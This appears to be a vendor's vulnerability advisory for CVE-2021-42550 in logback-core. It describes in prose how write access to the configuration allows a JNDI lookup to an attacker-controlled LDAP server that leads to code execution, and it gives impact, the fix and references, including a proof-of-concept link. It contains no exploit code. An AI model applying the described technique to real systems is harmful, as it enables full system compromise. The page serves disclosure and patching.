CVE-2021-42550
Arbitrary code execution vulnerability in logback-core (Maven)
What is CVE-2021-42550 About?
This vulnerability allows for arbitrary code execution in Logback versions 1.2.7 and prior. An attacker with privileges to edit configuration files can craft a malicious configuration to load and execute code from LDAP servers. This poses a severe risk, as it grants full control over the compromised system once exploited.
Affected Software
Technical Details
The vulnerability in Logback arises when an attacker has write access to the Logback configuration files. In such a scenario, the attacker can insert a maliciously crafted configuration entry that instructs Logback to initiate a JNDI (Java Naming and Directory Interface) lookup. This lookup can be pointed to an attacker-controlled LDAP (Lightweight Directory Access Protocol) server. The LDAP server, in turn, can serve a malicious Java object via JNDI. When Logback attempts to deserialize this object, it leads to the execution of arbitrary code provided by the attacker, effectively granting full control over the affected system.
What is the Impact of CVE-2021-42550?
Successful exploitation may allow attackers to execute arbitrary code with the privileges of the affected application, leading to full system compromise, data theft, or further network penetration.
What is the Exploitability of CVE-2021-42550?
Exploitation requires an attacker to have 'required privileges to edit configurations files' (e.g., file write access to the Logback configuration). This typically implies a prior compromise or specific administrative access. Authentication to the system for configuration modification would be necessary, and privilege levels would be high (e.g., admin or root user allowing file system changes). This would likely be a local exploit, or a remote exploit if the attacker can achieve remote file write access through another vulnerability. The main constraint is the prerequisite of configuration file modification, which makes the attack less straightforward than typical remote code execution flaws.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2021-42550?
Available Upgrade Options
- ch.qos.logback:logback-core
- <1.2.9 → Upgrade to 1.2.9
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://nvd.nist.gov/vuln/detail/CVE-2021-42550
- https://osv.dev/vulnerability/GHSA-668q-qrv7-99fm
- http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html
- https://github.com/qos-ch/logback/blob/1502cba4c1dfd135b2e715bc0cf80c0045d4d128/logback-site/src/site/pages/news.html
- http://seclists.org/fulldisclosure/2022/Jul/11
- https://github.com/qos-ch/logback
- https://jira.qos.ch/browse/LOGBACK-1591
- http://seclists.org/fulldisclosure/2022/Jul/11
- https://github.com/cn-panda/logbackRceDemo
- https://github.com/qos-ch/logback/commit/87291079a1de9369ac67e20dc70a8fdc7cc4359c
What are Similar Vulnerabilities to CVE-2021-42550?
Similar Vulnerabilities: CVE-2021-44228 , CVE-2022-22965 , CVE-2021-4104 , CVE-2022-22950 , CVE-2022-30190
